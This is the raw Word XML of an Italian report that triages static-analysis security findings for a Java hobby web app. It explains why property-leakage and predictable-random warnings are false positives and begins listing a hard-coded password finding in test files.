                              <w:t>: Schermata web salvataggio hobby da parte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2E34" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-35.05pt;margin-top:248.15pt;width:551.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5980420A" w14:textId="14EEB9A6" w:rsidR="005E267F" w:rsidRPr="006B1CA7"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2</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web salvataggio hobby da parte dell'utente</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12F5601E" wp14:editId="2BAF54F2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-562610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7003351" cy="3657469"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="339331680" name="Immagine 17" descr="Immagine che contiene testo, schermata,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1680" name="Immagine 17" descr="Immagine che contiene testo, schermata, frut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0F149BF5" w14:textId="4C2CEAEB" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="24AFC8C4" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="06B5DAFA" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="099E5F26" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="1BB4DC5F" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="0476D865" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="78BCDEB7" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="66CEE429" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898"/>
    <w:p w14:paraId="5904B280" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898"/>
    <w:p w14:paraId="64EBF866" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898"/>
    <w:p w14:paraId="20EA65A9" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898"/>
    <w:p w14:paraId="4E2B4266" w14:textId="77777777" w:rsidR="00922898" w:rsidRPr="005E267F" w:rsidRDefault="00922898" w:rsidP="0006778F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F2F79" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E4A4D2" w14:textId="4350D2EF" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="005E267F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HomeController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C918694" w14:textId="119CB8AA" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="005E267F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E2E649" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="005E267F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31ED2ECB" w14:textId="35F22187" w:rsidR="00922898" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Il m</w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve">etodo </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">analizzato è </w:t>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hobbiesShow(</w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve">) in </w:t>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HomeController</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e risulta un </w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve"> false positive perché tutti gli attributi dell’oggetto vengono utilizzati</w:t>
      </w:r>
      <w:r>
        <w:t>, come mostrato in Figura 3 nella schermata del browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328E2B5" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028E261B" w14:textId="34C988B9" w:rsidR="00922898" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="328EFB1F" wp14:editId="7C31EEDC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>43180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3378835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6069965" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1163092648" name="Casella di testo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59AB499D" w14:textId="7E3DAC63"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3</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata web developer con informazioni dell'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B1F" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.4pt;margin-top:266.05pt;width:477.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Gw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fzmZn7NmaTY/ON1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="59AB499D" w14:textId="7E3DAC63" w:rsidR="005E267F" w:rsidRPr="00DB1C34" w:rsidRDefault="005E267F" w:rsidP="005E267F">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web developer con informazioni dell'hobby</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5783EBA1" wp14:editId="6EC4AED9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>60325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6070325" cy="3261360"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="591182523" name="Immagine 1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2523" name="Immagine 18" descr="Immagine che contiene testo, schermata, software, Pagina Web&#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p>
    <w:p w14:paraId="22588019" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="383711F5" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="33B8AA70" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="4E6F5AA3" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="20F4F1CA" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="6FEC8C4D" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="60CF4F78" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="0C28A535" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="372BA9AE" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="27D77E40" w14:textId="77777777" w:rsidR="00922898" w:rsidRPr="005E267F" w:rsidRDefault="00922898" w:rsidP="005E267F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Predictable Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F103F4" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F10BFB" w14:textId="4B468FC1" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="005E267F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bbyServiceImpl</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAB218D" w14:textId="2D6876B5" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="005E267F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5369A" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1113233C" w14:textId="5E319196" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La vulnerabilità nasce quando i numeri casuali usati a scopi </w:t>
      </w:r>
      <w:r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crittografici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generati da un PRNG diventano predicibili, esponendo quindi informazioni sensibili agli attaccanti a causa della mancanza della randomicità. Si dovrebbero invece utilizzare i True Random Number Generator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B814D" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DC2BE8" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel nostro codice risulta un falso positivo poiché il numero generato randomicamente viene usato solo per selezionare degli hobby in maniera casuale e non ha a che fare con informazioni sensibili. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D4151" w14:textId="6DFF0A05" w:rsidR="00922898" w:rsidRDefault="00F56083" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251754496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C305AF9" wp14:editId="28E7FD30">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>659765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4537710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4792980" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="861440593" name="Casella di testo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A556AD" w14:textId="0FB5C4AD"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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>4</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Hobby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5AF9" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:51.95pt;margin-top:357.3pt;width:377.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BnGQIAAD8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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0EA556AD" w14:textId="0FB5C4AD" w:rsidR="00F56083" w:rsidRPr="009F7919" w:rsidRDefault="00F56083" w:rsidP="00F56083">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyServiceImpl.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52A52FE9" wp14:editId="09B8F311">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4792980" cy="4472305"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="482287439"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7439" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, numer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4472305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F98B2" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F619718" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEE308F" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C9CAAC" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1970F18B" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEF18CC" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B96FF89" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD5F1CE" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3703FC6D" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7151842F" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAFECFA" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABB99D7" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102DF9E4" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9C0D88" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F56D507" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD7367E" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753F7BF5" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D17A679" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20110ADE" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A67F4F9" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AC89AC" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D4036F" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360C565A" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF7D0B7" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B787C11" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF822C7" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290B02C0" w14:textId="3C5C870C" w:rsidR="00370730" w:rsidRPr="0006778F" w:rsidRDefault="0006778F" w:rsidP="0006778F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Veri Positivi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7C0A5" w14:textId="69174B60" w:rsidR="00B63358" w:rsidRPr="00B63358" w:rsidRDefault="00491A55" w:rsidP="00B63358">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hard coded password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C08943" w14:textId="150BB7D2" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UserControllerTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, UserServiceTest.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F802963" w14:textId="72871C03" w:rsidR="00B63358" w:rsidRDefault="00B63358" w:rsidP="00B63358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">62,76,84,96 per </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UserControllerTest</w:t>
